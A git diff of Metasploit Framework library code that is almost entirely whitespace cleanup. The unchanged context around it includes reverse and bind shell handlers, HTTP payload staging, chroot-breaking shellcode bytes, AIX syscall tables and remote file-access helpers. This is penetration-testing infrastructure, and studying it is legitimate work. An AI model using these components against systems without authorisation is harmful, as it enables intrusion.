@@ -79,19 +79,19 @@ module BindTcp # Maximum number of seconds to run the handler ctimeout = 150 - + if (exploit_config and exploit_config['active_timeout']) ctimeout = exploit_config['active_timeout'].to_i end - + # Take a copy of the datastore options rhost = datastore['RHOST'] lport = datastore['LPORT'] - + # Ignore this if one of the required options is missing return if not rhost return if not lport - + # Only try the same host/port combination once phash = rhost + ':' + lport.to_s return if self.listener_pairs[phash] @@ -100,17 +100,17 @@ module BindTcp # Start a new handling thread self.listener_threads << framework.threads.spawn("BindTcpHandlerListener-#{lport}", false) { client = nil - + print_status("Started bind handler") if (rhost == nil) - raise ArgumentError, + raise ArgumentError, "RHOST is not defined; bind stager cannot function.", caller end stime = Time.now.to_i - + while (stime + ctimeout > Time.now.to_i) begin client = Rex::Socket::Tcp.create( @@ -137,10 +137,10 @@ module BindTcp # Valid client connection? if (client) - + # Increment the has connection counter self.pending_connections += 1 - + # Start a new thread and pass the client connection # as the input and output pipe. Client's are expected # to implement the Stream interface. @@ -157,7 +157,7 @@ module BindTcp } end - # + # # Nothing to speak of. # def stop_handler diff --git a/lib/msf/core/handler/find_shell.rb b/lib/msf/core/handler/find_shell.rb index 7797aa37b9..6a34d9160b 100644 --- a/lib/msf/core/handler/find_shell.rb +++ b/lib/msf/core/handler/find_shell.rb @@ -38,9 +38,9 @@ module FindShell protected - + end end -end \ No newline at end of file +end diff --git a/lib/msf/core/handler/find_tag.rb b/lib/msf/core/handler/find_tag.rb index f079234924..d3c165d7f3 100644 --- a/lib/msf/core/handler/find_tag.rb +++ b/lib/msf/core/handler/find_tag.rb 
@@ -37,10 +37,10 @@ module FindTag register_advanced_options( [ - OptString.new('TAG', - [ - true, - "The four byte tag to signify the connection.", + OptString.new('TAG', + [ + true, + "The four byte tag to signify the connection.", Rex::Text.rand_text_alphanumeric(4), ]) ], Msf::Handler::FindTag) diff --git a/lib/msf/core/handler/find_tty.rb b/lib/msf/core/handler/find_tty.rb index 0fe299615e..03b8506689 100644 --- a/lib/msf/core/handler/find_tty.rb +++ b/lib/msf/core/handler/find_tty.rb @@ -45,7 +45,7 @@ protected return (sock.commandstate ? false : true) end return true - end + end end diff --git a/lib/msf/core/handler/none.rb b/lib/msf/core/handler/none.rb index cce7babfbe..61ec556865 100644 --- a/lib/msf/core/handler/none.rb +++ b/lib/msf/core/handler/none.rb @@ -8,7 +8,7 @@ module Handler ### module None include Msf::Handler - + # # Returns the handler type of none since payloads that use this handler # have no connection. @@ -27,4 +27,4 @@ module None end end -end \ No newline at end of file +end diff --git a/lib/msf/core/handler/reverse_http.rb b/lib/msf/core/handler/reverse_http.rb index 0f099174e9..37a53e82b3 100644 --- a/lib/msf/core/handler/reverse_http.rb +++ b/lib/msf/core/handler/reverse_http.rb 
@@ -125,24 +125,24 @@ protected lhost = datastore['LHOST'] - - # Default to our own IP if the user specified 0.0.0.0 (pebkac avoidance) + + # Default to our own IP if the user specified 0.0.0.0 (pebkac avoidance) if lhost.empty? or lhost == '0.0.0.0' lhost = Rex::Socket.source_address(cli.peerhost) end - + # Process the requested resource. case req.relative_resource when /^\/INITJM/ print_line("Java: #{req.relative_resource}") - + conn_id = "CONN_" + Rex::Text.rand_text_alphanumeric(16) - url = "http://#{lhost}:#{datastore['LPORT']}/" + conn_id + "/\x00" + url = "http://#{lhost}:#{datastore['LPORT']}/" + conn_id + "/\x00" print_line "URL: #{url.inspect}" - + blob = "" blob << obj.generate_stage - + # This is a TLV packet - I guess somewhere there should be API for building them # in Metasploit :-) packet = "" @@ -151,7 +151,7 @@ protected packet << [12, 0x2000b, datastore['SessionExpirationTimeout'].to_i].pack('NNN') packet << [12, 0x20019, datastore['SessionCommunicationTimeout'].to_i].pack('NNN') blob << [packet.length+8, 0].pack('NN') + packet - + resp.body = blob conn_ids << conn_id @@ -164,7 +164,7 @@ protected :comm_timeout => datastore['SessionCommunicationTimeout'].to_i, :ssl => false }) - + when /^\/A?INITM?/ print_line("Win32: #{req.relative_resource}") diff --git a/lib/msf/core/handler/reverse_https.rb b/lib/msf/core/handler/reverse_https.rb index 4bf1f20d6d..5460f9cc7f 100644 --- a/lib/msf/core/handler/reverse_https.rb +++ b/lib/msf/core/handler/reverse_https.rb @@ -125,12 +125,12 @@ protected print_status("#{cli.peerhost}:#{cli.peerport} Request received for #{req.relative_resource}...") lhost = datastore['LHOST'] - - # Default to our own IP if the user specified 0.0.0.0 (pebkac avoidance) + + # Default to our own IP if the user specified 0.0.0.0 (pebkac avoidance) if lhost.empty? or lhost == '0.0.0.0' lhost = Rex::Socket.source_address(cli.peerhost) end - + # Process the requested resource. case req.relative_resource when /^\/INITJM/ 
diff --git a/lib/msf/core/handler/reverse_tcp.rb b/lib/msf/core/handler/reverse_tcp.rb index 5e290fcbf8..9c5f26c8a8 100644 --- a/lib/msf/core/handler/reverse_tcp.rb +++ b/lib/msf/core/handler/reverse_tcp.rb @@ -45,7 +45,7 @@ module ReverseTcp [ Opt::LHOST, Opt::LPORT(4444) - ], Msf::Handler::ReverseTcp) + ], Msf::Handler::ReverseTcp) # XXX: Not supported by all modules register_advanced_options( @@ -55,7 +55,7 @@ module ReverseTcp OptString.new('ReverseListenerComm', [ false, 'The specific communication channel to use for this listener']), ], Msf::Handler::ReverseTcp) - + self.handler_queue = ::Queue.new end @@ -75,16 +75,16 @@ module ReverseTcp # First attempt to bind LHOST. If that fails, the user probably has # something else listening on that interface. Try again with ANY_ADDR. any = (addr.length == 4) ? "0.0.0.0" : "::0" - + addrs = [ Rex::Socket.addr_ntoa(addr), any ] - + comm = datastore['ReverseListenerComm'] if comm.to_s == "local" comm = ::Rex::Socket::Comm::Local else comm = nil end - + if not datastore['ReverseListenerBindAddress'].to_s.empty? # Only try to bind to this specific interface addrs = [ datastore['ReverseListenerBindAddress'] ] @@ -105,12 +105,12 @@ module ReverseTcp 'MsfPayload' => self, 'MsfExploit' => assoc_exploit }) - + ex = false - + comm_used = comm || Rex::Socket::SwitchBoard.best_comm( ip ) comm_used = Rex::Socket::Comm::Local if comm_used == nil - + if( comm_used.respond_to?( :type ) and comm_used.respond_to?( :sid ) ) via = "via the #{comm_used.type} on session #{comm_used.sid}" else @@ -124,7 +124,7 @@ module ReverseTcp print_error("Handler failed to bind to #{ip}:#{datastore['LPORT']}") end } - raise ex if (ex) + raise ex if (ex) end # @@ -144,7 +144,7 @@ module ReverseTcp begin # Accept a client connection begin - client = self.listener_sock.accept + client = self.listener_sock.accept rescue wlog("Exception raised during listener accept: #{$!}\n\n#{$@.join("\n")}") break 
@@ -152,11 +152,11 @@ module ReverseTcp # Increment the has connection counter self.pending_connections += 1 - + self.handler_queue.push( client ) end while true } - + self.handler_thread = framework.threads.spawn("ReverseTcpHandlerWorker-#{datastore['LPORT']}", false) { while true client = self.handler_queue.pop @@ -167,10 +167,10 @@ module ReverseTcp end end } - + end - # + # # Stops monitoring for an inbound connection. # def stop_handler @@ -185,7 +185,7 @@ module ReverseTcp self.handler_thread.kill self.handler_thread = nil end - + if (self.listener_sock) self.listener_sock.close self.listener_sock = nil diff --git a/lib/msf/core/handler/reverse_tcp_allports.rb b/lib/msf/core/handler/reverse_tcp_allports.rb index c1e5cc57af..120cc52997 100644 --- a/lib/msf/core/handler/reverse_tcp_allports.rb +++ b/lib/msf/core/handler/reverse_tcp_allports.rb @@ -24,7 +24,7 @@ module ReverseTcpAllPorts def self.handler_type return "reverse_tcp_allports" end - + # # Returns the connection-described general handler type, in this case # 'reverse'. @@ -32,7 +32,7 @@ module ReverseTcpAllPorts def self.general_handler_type "reverse" end - + # # Override the default port to be '1' # diff --git a/lib/msf/core/model/cred.rb b/lib/msf/core/model/cred.rb index c362911e33..3ba51c4a4e 100644 --- a/lib/msf/core/model/cred.rb +++ b/lib/msf/core/model/cred.rb @@ -14,7 +14,7 @@ class Cred < ActiveRecord::Base return false unless self.proof return false if self.proof.empty? key_id_regex = /[0-9a-fA-F:]+/ - my_key_id = self.proof[key_id_regex].to_s.downcase + my_key_id = self.proof[key_id_regex].to_s.downcase other_key_id = other.proof[key_id_regex].to_s.downcase my_key_id == other_key_id end diff --git a/lib/msf/core/model/host.rb b/lib/msf/core/model/host.rb index 5f5311cbc5..1ba7aa1e5f 100644 --- a/lib/msf/core/model/host.rb +++ b/lib/msf/core/model/host.rb 
@@ -21,10 +21,10 @@ class Host < ActiveRecord::Base validates_exclusion_of :address, :in => ['127.0.0.1'] validates_uniqueness_of :address, :scope => :workspace_id - def attribute_locked?(attr) - n = notes.find_by_ntype("host.updated.#{attr}") - n && n.data[:locked] - end + def attribute_locked?(attr) + n = notes.find_by_ntype("host.updated.#{attr}") + n && n.data[:locked] + end # Determine if the fingerprint data is readable. If not, it nearly always # means that there was a problem with the YAML or the Marshal'ed data, @@ -801,7 +801,7 @@ protected ret[:os_flavor] = "Windows 7" ret[:type] = "client" else - ret[:os_flavor] = data[:product].gsub("Windows", '').strip + ret[:os_flavor] = data[:product].gsub("Windows", '').strip ret[:os_sp] = data[:version] if data[:version] if data[:product] ret[:type] = "server" if data[:product][/Server/] diff --git a/lib/msf/core/model/macro.rb b/lib/msf/core/model/macro.rb index 64ef97dd98..df8d9399bc 100644 --- a/lib/msf/core/model/macro.rb +++ b/lib/msf/core/model/macro.rb @@ -4,7 +4,7 @@ class DBManager class Macro < ActiveRecord::Base include DBSave serialize :actions - serialize :prefs + serialize :prefs end end diff --git a/lib/msf/core/model/service.rb b/lib/msf/core/model/service.rb index 4f8de749be..dba6f96864 100644 --- a/lib/msf/core/model/service.rb +++ b/lib/msf/core/model/service.rb @@ -9,11 +9,11 @@ class Service < ActiveRecord::Base has_many :exploited_hosts, :dependent => :destroy has_many :web_sites, :dependent => :destroy belongs_to :host - + has_many :web_pages, :through => :web_sites has_many :web_forms, :through => :web_sites has_many :web_vulns, :through => :web_sites - + serialize :info def after_save diff --git a/lib/msf/core/model/web_site.rb b/lib/msf/core/model/web_site.rb index 8b8ed565ba..a79c6b5dde 100644 --- a/lib/msf/core/model/web_site.rb +++ b/lib/msf/core/model/web_site.rb 
@@ -7,9 +7,9 @@ class WebSite < ActiveRecord::Base has_many :web_pages, :dependent => :destroy has_many :web_forms, :dependent => :destroy has_many :web_vulns, :dependent => :destroy - + serialize :options - + def to_url(ignore_vhost=false) proto = self.service.name == "https" ? "https" : "http" host = ignore_vhost ? self.service.host.address : self.vhost @@ -20,19 +20,19 @@ class WebSite < ActiveRecord::Base end url end - + def page_count web_pages.size end - + def form_count web_forms.size end - + def vuln_count web_vulns.size - end - + end + end end diff --git a/lib/msf/core/module/auxiliary_action.rb b/lib/msf/core/module/auxiliary_action.rb index 34302be79d..44ee3fb83b 100644 --- a/lib/msf/core/module/auxiliary_action.rb +++ b/lib/msf/core/module/auxiliary_action.rb @@ -11,7 +11,7 @@ class Msf::Module::AuxiliaryAction # # Serialize from an array to an Action instance. # - def self.from_a(ary) + def self.from_a(ary) return nil if ary.nil? self.new(*ary) end diff --git a/lib/msf/core/module/platform.rb b/lib/msf/core/module/platform.rb index 40f6f671a1..e1a29847a5 100644 --- a/lib/msf/core/module/platform.rb +++ b/lib/msf/core/module/platform.rb @@ -30,7 +30,7 @@ class Msf::Module::Platform name.split('::')[3 .. -1].each { |part| c = c.const_get(part) if (c.const_defined?('RealName') == true) - names << c.const_get('RealName') + names << c.const_get('RealName') else names << part end @@ -65,7 +65,7 @@ class Msf::Module::Platform # # Finds all inherited children from a given module. - # + # def self.find_children @subclasses ||= [] @subclasses.sort_by { |a| a::Rank } @@ -130,14 +130,14 @@ class Msf::Module::Platform # the string). # def self.find_portion(mod, str) - + # Check to see if we've built the abbreviated cache if (not ( mod.const_defined?('Abbrev') and mod.const_defined?('Names') and mod.const_defined?('Ranks') - ) ) - build_child_platform_abbrev(mod) + ) ) + build_child_platform_abbrev(mod) end if (not mod.const_defined?('Names')) 
@@ -145,7 +145,7 @@ class Msf::Module::Platform raise RuntimeError.new("Failed to instantiate the platform list for module #{mod}") return nil end - + abbrev = mod.const_get('Abbrev') names = mod.const_get('Names') ranks = mod.const_get('Ranks') @@ -177,7 +177,7 @@ class Msf::Module::Platform if (best == nil) raise ArgumentError, "No classes in #{mod} for #{str}!", caller end - + return best end @@ -189,7 +189,7 @@ class Msf::Module::Platform # Builtin platforms # ## - + # # Windows # @@ -438,7 +438,7 @@ class Msf::Module::Platform Rank = 100 Alias = "aix" end - + # # HP-UX # @@ -446,7 +446,7 @@ class Msf::Module::Platform Rank = 100 Alias = "hpux" end - + # # Irix # @@ -454,7 +454,7 @@ class Msf::Module::Platform Rank = 100 Alias = "irix" end - + # # Generic Unix # @@ -462,12 +462,12 @@ class Msf::Module::Platform Rank = 100 Alias = "unix" end - + # # Generic PHP # class PHP < Msf::Module::Platform Rank = 100 Alias = "php" - end + end end diff --git a/lib/msf/core/module/reference.rb b/lib/msf/core/module/reference.rb index d1298ea13e..32293a77ae 100644 --- a/lib/msf/core/module/reference.rb +++ b/lib/msf/core/module/reference.rb @@ -106,7 +106,7 @@ class Msf::Module::SiteReference < Msf::Module::Reference elsif (in_ctx_id == 'US-CERT-VU') self.site = 'http://www.kb.cert.org/vuls/id/' + in_ctx_val.to_s elsif (in_ctx_id == 'BPS') - self.site = 'https://strikecenter.bpointsys.com/bps/advisory/BPS-' + in_ctx_val.to_s + self.site = 'https://strikecenter.bpointsys.com/bps/advisory/BPS-' + in_ctx_val.to_s elsif (in_ctx_id == 'URL') self.site = in_ctx_val.to_s else diff --git a/lib/msf/core/module/target.rb b/lib/msf/core/module/target.rb index 70f2149af7..dfc4409e3c 100644 --- a/lib/msf/core/module/target.rb +++ b/lib/msf/core/module/target.rb 
@@ -31,7 +31,7 @@ class Msf::Module::Target # def start_addresses if (self['Start'] and self['Start'].kind_of?(Hash) == false) - return {'Address' => self['Start'] } + return {'Address' => self['Start'] } else return self['Start'] end @@ -43,7 +43,7 @@ class Msf::Module::Target # def stop_addresses if (self['Stop'] and self['Stop'].kind_of?(Hash) == false) - return {'Address' => self['Stop'] } + return {'Address' => self['Stop'] } else return self['Stop'] end @@ -136,9 +136,9 @@ class Msf::Module::Target self.save_registers = opts['SaveRegisters'] self.ret = opts['Ret'] self.opts = opts - + if (opts['Arch']) - self.arch = Rex::Transformer.transform(opts['Arch'], Array, + self.arch = Rex::Transformer.transform(opts['Arch'], Array, [ String ], 'Arch') end @@ -210,7 +210,7 @@ class Msf::Module::Target def payload_max_nops opts['Payload'] ? opts['Payload']['MaxNops'] : nil end - + # # Payload min nops information for this target. # @@ -287,4 +287,4 @@ protected attr_writer :name, :platform, :arch, :opts, :ret, :save_registers # :nodoc: attr_writer :bruteforce # :nodoc: -end \ No newline at end of file +end diff --git a/lib/msf/core/module/target.rb.ut.rb b/lib/msf/core/module/target.rb.ut.rb index 59169fcb9e..2b5c79f612 100644 --- a/lib/msf/core/module/target.rb.ut.rb +++ b/lib/msf/core/module/target.rb.ut.rb @@ -11,7 +11,7 @@ class Module::Target::UnitTest < Test::Unit::TestCase def test_target t = Target.from_a(['Universal', { 'Platform' => 'winxpsp0', - 'Ret' => 0x12345678 + 'Ret' => 0x12345678 }]) assert_equal('Universal', t.name) @@ -22,4 +22,4 @@ class Module::Target::UnitTest < Test::Unit::TestCase end end -end \ No newline at end of file +end diff --git a/lib/msf/core/payload/aix.rb b/lib/msf/core/payload/aix.rb index 65d6490c19..d1eb3fffe7 100644 --- a/lib/msf/core/payload/aix.rb +++ b/lib/msf/core/payload/aix.rb 
@@ -46,7 +46,7 @@ module Msf::Payload::Aix # # NOTE: - # + # # To add a syscall set, add a aix_XXXX_syscalls hash as seen below, # and add a line to the versions hash using that version. # @@ -62,7 +62,7 @@ module Msf::Payload::Aix :__NR_close => 278, :__NR_kfcntl => 658 } - + aix_613_syscalls = { :__NR_execve => 7, :__NR_getpeername => 205, @@ -74,7 +74,7 @@ module Msf::Payload::Aix :__NR_close => 272, :__NR_kfcntl => 644 } - + aix_612_syscalls = { :__NR_execve => 7, :__NR_getpeername => 205, @@ -86,7 +86,7 @@ module Msf::Payload::Aix :__NR_close => 272, :__NR_kfcntl => 635 } - + aix_611_syscalls = { :__NR_execve => 7, :__NR_getpeername => 202, @@ -98,7 +98,7 @@ module Msf::Payload::Aix :__NR_close => 269, :__NR_kfcntl => 614 } - + aix_610_syscalls = { :__NR_execve => 6, :__NR_getpeername => 203, @@ -110,7 +110,7 @@ module Msf::Payload::Aix :__NR_close => 269, :__NR_kfcntl => 617 } - + aix_53x_syscalls = { :__NR_execve => 6, :__NR_getpeername => 198, @@ -122,7 +122,7 @@ module Msf::Payload::Aix :__NR_close => 245, :__NR_kfcntl => 493 } - + aix_51_syscalls = { :__NR_execve => 5, :__NR_getpeername => 122, diff --git a/lib/msf/core/payload/java.rb b/lib/msf/core/payload/java.rb index 44224397a1..d3555f41ff 100644 --- a/lib/msf/core/payload/java.rb +++ b/lib/msf/core/payload/java.rb @@ -2,7 +2,7 @@ require 'msf/core' module Msf::Payload::Java - # + # # Used by stages; all java stages need to define +@stage_class_files+ as an # array of .class files located in data/java/ # diff --git a/lib/msf/core/payload/linux.rb b/lib/msf/core/payload/linux.rb index 6af062155f..77f56462a2 100644 --- a/lib/msf/core/payload/linux.rb +++ b/lib/msf/core/payload/linux.rb @@ -108,7 +108,7 @@ module Msf::Payload::Linux "\x6a\x46" +# pushl $0x46 # "\x58" +# popl %eax # "\xcd\x80" # int $0x80 # - + # break chroot pre << "\x6a\x3d" +# pushl $0x3d # # build dir str (ptr in ebx) 
@@ -138,7 +138,7 @@ module Msf::Payload::Linux "\x58" +# popl %eax # "\xcd\x80" # int $0x80 # end - + # Append if (datastore['AppendExit']) @@ -190,7 +190,7 @@ module Msf::Payload::Linux "\x7c\x63\x1a\x78" +# xor r3,r3,r3 # "\x38\x1f\xfe\x47" +# addi r0,r31,-441 # "\x44\xff\xff\x02" # sc # - + # EEK! unsupported... end diff --git a/lib/msf/core/payload/netware.rb b/lib/msf/core/payload/netware.rb index 9ce41f475b..7e65c72956 100644 --- a/lib/msf/core/payload/netware.rb +++ b/lib/msf/core/payload/netware.rb @@ -16,18 +16,18 @@ module Msf::Payload::Netware # # Returns a list of compatible encoders based on architecture - # fnstenv does not work on NetWare + # fnstenv does not work on NetWare # def compatible_encoders encoders = super() - encoders2 = [] - + encoders2 = [] + encoders.each { |encname, encmod| - if (!encname.include?('fnstenv_mov') && !encname.include?('shikata_ga_nai')) - encoders2 << [ encname, encmod ] - end + if (!encname.include?('fnstenv_mov') && !encname.include?('shikata_ga_nai')) + encoders2 << [ encname, encmod ] + end } - + return encoders2; end -end \ No newline at end of file +end diff --git a/lib/msf/core/payload/single.rb b/lib/msf/core/payload/single.rb index bdef8e5094..4ecbd66be4 100644 --- a/lib/msf/core/payload/single.rb +++ b/lib/msf/core/payload/single.rb @@ -2,7 +2,7 @@ require 'msf/core' ### # -# Base mixin interface for use by single payloads. Single +# Base mixin interface for use by single payloads. Single # payloads are differentiated from stagers and stages by the # fact that they run as part of the first stage and have # no subsequent stages. @@ -41,4 +41,4 @@ module Msf::Payload::Single end end -end \ No newline at end of file +end diff --git a/lib/msf/core/post/file.rb b/lib/msf/core/post/file.rb index 46110fe06c..5da2f65177 100644 --- a/lib/msf/core/post/file.rb +++ b/lib/msf/core/post/file.rb @@ -75,7 +75,7 @@ module File else data = session.shell_command_token("cat \'#{file_name}\'") end - + end data end 
@@ -95,11 +95,11 @@ module File else session.shell_command_token("echo \'#{data}\' > \'#{file_name}\'") end - + end return true end - + # # Platform-agnostic file append. Appends given object content to a remote file. # Returns Boolean true if successful @@ -118,7 +118,7 @@ module File end return true end - + protected # diff --git a/lib/msf/core/rpc/auth.rb b/lib/msf/core/rpc/auth.rb index 2b30684396..67b3e63235 100644 --- a/lib/msf/core/rpc/auth.rb +++ b/lib/msf/core/rpc/auth.rb @@ -3,7 +3,7 @@ module RPC class Auth < Base def login(user,pass) - + # handle authentication here fail = true @users.each do |u| @@ -12,21 +12,21 @@ class Auth < Base break end end - + if fail # Introduce a random delay in the response to annoy brute forcers delay = [ ( rand(3000) / 1000.0 ), 0.50 ].max ::IO.select(nil, nil, nil, delay) - + # Send back a 401 denied error raise ::XMLRPC::FaultException.new(401, "authentication error") end - + token = Rex::Text.rand_text_alphanumeric(32) @tokens[token] = [user, Time.now.to_i, Time.now.to_i] { "result" => "success", "token" => token } end - + def logout(token) @tokens.delete(token) { "result" => "success" } diff --git a/lib/msf/core/rpc/base.rb b/lib/msf/core/rpc/base.rb index 0968cb3ccd..257bcd4685 100644 --- a/lib/msf/core/rpc/base.rb +++ b/lib/msf/core/rpc/base.rb @@ -10,12 +10,12 @@ class Base private - def authenticate(token) + def authenticate(token) stale = [] - + # Force the encoding to ASCII-8BIT token = token.unpack("C*").pack("C*") - + @tokens.each_key do |t| user,ctime,mtime,perm = @tokens[t] if ! perm and mtime + 300 < Time.now.to_i diff --git a/lib/msf/core/rpc/db.rb b/lib/msf/core/rpc/db.rb index 3c7086e728..e67faa9882 100644 --- a/lib/msf/core/rpc/db.rb +++ b/lib/msf/core/rpc/db.rb 
@@ -3,13 +3,13 @@ module RPC class Db < Base private - def db + def db @framework.db.active end def workspace(wspace = nil) - if(wspace and wspace != "") - return @framework.db.find_workspace(wspace) + if(wspace and wspace != "") + return @framework.db.find_workspace(wspace) end @framework.db.workspace end @@ -23,7 +23,7 @@ private end def opts_to_hosts(opts) - wspace = workspace(opts[:workspace]) + wspace = workspace(opts[:workspace]) hosts = [] if opts[:host] or opts[:address] host = opts[:host] || opts[:address] @@ -42,7 +42,7 @@ private end def opts_to_services(hosts,opts) - wspace = workspace(opts[:workspace]) + wspace = workspace(opts[:workspace]) services = [] if opts[:host] or opts[:address] or opts[:addresses] return services if hosts.count < 1 @@ -73,7 +73,7 @@ private def clean_nils(obj) return '' if obj == nil if obj.is_a? Hash - obj.each_key do |key| + obj.each_key do |key| obj[key] = clean_nils(obj[key]) end elsif obj.is_a? Array @@ -161,7 +161,7 @@ public end return ret if (not services) - + services.each do |s| service = {} host = s.host @@ -220,7 +220,7 @@ public services << sret if sret.class == Msf::DBManager::Service services |= sret if sret.class == Array end - + #get list of vulns if services.count > 0 services.each do |s| @@ -253,7 +253,7 @@ public vulns.each do |v| vuln = {} reflist = v.refs.map { |r| r.name } - if(v.service) + if(v.service) vuln[:port] = v.service.port vuln[:proto] = v.service.proto else @@ -261,7 +261,7 @@ public vuln[:proto] = nil end vuln[:time] = v.created_at.to_i - vuln[:host] = v.host.address || v.host.address6 || nil + vuln[:host] = v.host.address || v.host.address6 || nil vuln[:name] = v.name vuln[:refs] = reflist.join(',') ret[:vulns] << vuln @@ -373,7 +373,7 @@ public host[:info] = h.info.to_s ret[:host] << host end - ret + ret end def report_host(token,xopts) 
@@ -385,7 +385,7 @@ public res = @framework.db.report_host(opts) return { :result => 'success' } if(res) { :result => 'failed' } - + end def report_service(token,xopts) @@ -430,7 +430,7 @@ public services << sret if sret.class == Msf::DBManager::Service services |= sret if sret.class == Array - + services.each do |s| service = {} host = s.host @@ -546,7 +546,7 @@ public service = host.services.find_by_proto_and_port(opts[:proto],opts[:port]) if host.services.count > 0 opts[:service] = service if service end - + res = @framework.db.report_note(opts) return { :result => 'success' } if(res) { :result => 'failed' } @@ -593,7 +593,7 @@ public services << sret if sret.class == Msf::DBManager::Service services |= sret if sret.class == Array end - + #get list of notes if services.count > 0 services.each do |s| @@ -660,7 +660,7 @@ public i.each do |k,v| info[k.to_sym] = v end - ret[:auth_info] << info + ret[:auth_info] << info end ret end @@ -674,11 +674,11 @@ public authenticate(token) raise ::XMLRPC::FaultException.new(404, "database not loaded") if(not db) opts = fix_options(xopts) - wspace = workspace(opts[:workspace]) + wspace = workspace(opts[:workspace]) hosts = [] services = [] vulns = [] - + if opts[:host] or opts[:address] or opts[:addresses] hosts = opts_to_hosts(opts) end @@ -734,21 +734,21 @@ public dent[:proto] = v.service.proto if v.service dent[:name] = v.name deleted << dent - v.destroy + v.destroy end - - return { :result => 'success', :deleted => deleted } + + return { :result => 'success', :deleted => deleted } end def del_note(token,xopts) authenticate(token) raise ::XMLRPC::FaultException.new(404, "database not loaded") if(not db) opts = fix_options(xopts) - wspace = workspace(opts[:workspace]) + wspace = workspace(opts[:workspace]) hosts = [] services = [] notes = [] - + if opts[:host] or opts[:address] or opts[:addresses] hosts = opts_to_hosts(opts) end 
@@ -803,17 +803,17 @@ public dent[:proto] = n.service.proto if n.service dent[:ntype] = n.ntype deleted << dent - n.destroy + n.destroy end - - return { :result => 'success', :deleted => deleted } + + return { :result => 'success', :deleted => deleted } end def del_service(token,xopts) authenticate(token) raise ::XMLRPC::FaultException.new(404, "database not loaded") if(not db) opts = fix_options(xopts) - wspace = workspace(opts[:workspace]) + wspace = workspace(opts[:workspace]) hosts = [] services = [] if opts[:host] or opts[:address] @@ -852,9 +852,9 @@ public services << sret if sret and sret.class == Msf::DBManager::Service services |= sret if sret and sret.class == Array end - - - + + + deleted = [] services.each do |s| dent = {} @@ -862,17 +862,17 @@ public dent[:port] = s.port dent[:proto] = s.proto deleted << dent - s.destroy + s.destroy end - - return { :result => 'success', :deleted => deleted } + + return { :result => 'success', :deleted => deleted } end def del_host(token,xopts) authenticate(token) raise ::XMLRPC::FaultException.new(404, "database not loaded") if(not db) opts = fix_options(xopts) - wspace = workspace(opts[:workspace]) + wspace = workspace(opts[:workspace]) hosts = [] if opts[:host] or opts[:address] host = opts[:host] || opts[:address] @@ -890,10 +890,10 @@ public deleted = [] hosts.each do |h| deleted << h.address.to_s - h.destroy + h.destroy end - - return { :result => 'success', :deleted => deleted } + + return { :result => 'success', :deleted => deleted } end @@ -922,8 +922,8 @@ public event[:created_at] = e.created_at.to_i event[:updated_at] = e.updated_at.to_i event[:name] = e.name - event[:critical] = e.critical if(e.critical) - event[:username] = e.username if(e.username) + event[:critical] = e.critical if(e.critical) + event[:username] = e.username if(e.username) event[:info] = e.info ret[:events] << event end 
@@ -963,7 +963,7 @@ public loot = {} loot[:host] = l.host.address || l.host.address6 if(l.host) loot[:service] = l.service.name || l.service.port if(l.service) - loot[:ltype] = l.ltype + loot[:ltype] = l.ltype loot[:content_type] = l.content_type loot[:data] = l.data if (l.data) loot[:created_at] = l.created_at.to_i @@ -985,7 +985,7 @@ public return { :result => 'success' } if(res) { :result => 'failed' } end - + #right now workspace is the only option supported def creds(token,xopts) authenticate(token) @@ -1009,7 +1009,7 @@ public end ret end - + def import_data(token,xopts) authenticate(token) raise ::XMLRPC::FaultException.new(404, "database not loaded") if(not db) @@ -1019,7 +1019,7 @@ public @framework.db.import(opts) return { :result => 'success' } end - + def import_msfe_xml(token,xopts) authenticate(token) raise ::XMLRPC::FaultException.new(404, "database not loaded") if(not db) @@ -1029,7 +1029,7 @@ public @framework.db.import(opts) return { :result => 'success' } end - + def import_nexpose_simplexml(args={}) authenticate(token) raise ::XMLRPC::FaultException.new(404, "database not loaded") if(not db) @@ -1039,7 +1039,7 @@ public @framework.db.import(opts) return { :result => 'success' } end - + def import_nexpose_rawxml(args={}) authenticate(token) raise ::XMLRPC::FaultException.new(404, "database not loaded") if(not db) @@ -1049,7 +1049,7 @@ public @framework.db.import(opts) return { :result => 'success' } end - + def import_nmap_xml(token,xopts) authenticate(token) raise ::XMLRPC::FaultException.new(404, "database not loaded") if(not db) @@ -1059,7 +1059,7 @@ public @framework.db.import(opts) return { :result => 'success' } end - + def import_nessus_nbe(token,xopts) authenticate(token) raise ::XMLRPC::FaultException.new(404, "database not loaded") if(not db) 
@@ -1069,7 +1069,7 @@ public @framework.db.import(opts) return { :result => 'success' } end - + def import_nessus_xml(token,xopts) authenticate(token) raise ::XMLRPC::FaultException.new(404, "database not loaded") if(not db) @@ -1079,7 +1079,7 @@ public @framework.db.import(opts) return { :result => 'success' } end - + def import_nessus_xml_v2(token,xopts) authenticate(token) raise ::XMLRPC::FaultException.new(404, "database not loaded") if(not db) @@ -1089,7 +1089,7 @@ public @framework.db.import(opts) return { :result => 'success' } end - + def import_qualys_xml(token,xopts) authenticate(token) raise ::XMLRPC::FaultException.new(404, "database not loaded") if(not db) @@ -1099,7 +1099,7 @@ public @framework.db.import(opts) return { :result => 'success' } end - + def import_ip_list(token,xopts) authenticate(token) raise ::XMLRPC::FaultException.new(404, "database not loaded") if(not db) @@ -1109,7 +1109,7 @@ public @framework.db.import(opts) return { :result => 'success' } end - + def import_amap_log(args={}) authenticate(token) raise ::XMLRPC::FaultException.new(404, "database not loaded") if(not db) @@ -1119,7 +1119,7 @@ public @framework.db.import(opts) return { :result => 'success' } end - + def import_amap_mlog(token,xopts) authenticate(token) raise ::XMLRPC::FaultException.new(404, "database not loaded") if(not db) @@ -1151,7 +1151,7 @@ public return ret if sret == nil services << sret if sret.class == Msf::DBManager::Service services |= sret if sret.class == Array - + services.each do |s| vulns |= s.vulns end @@ -1160,7 +1160,7 @@ public end return ret if (not vulns) - + vulns.each do |v| vuln= {} host= v.host 
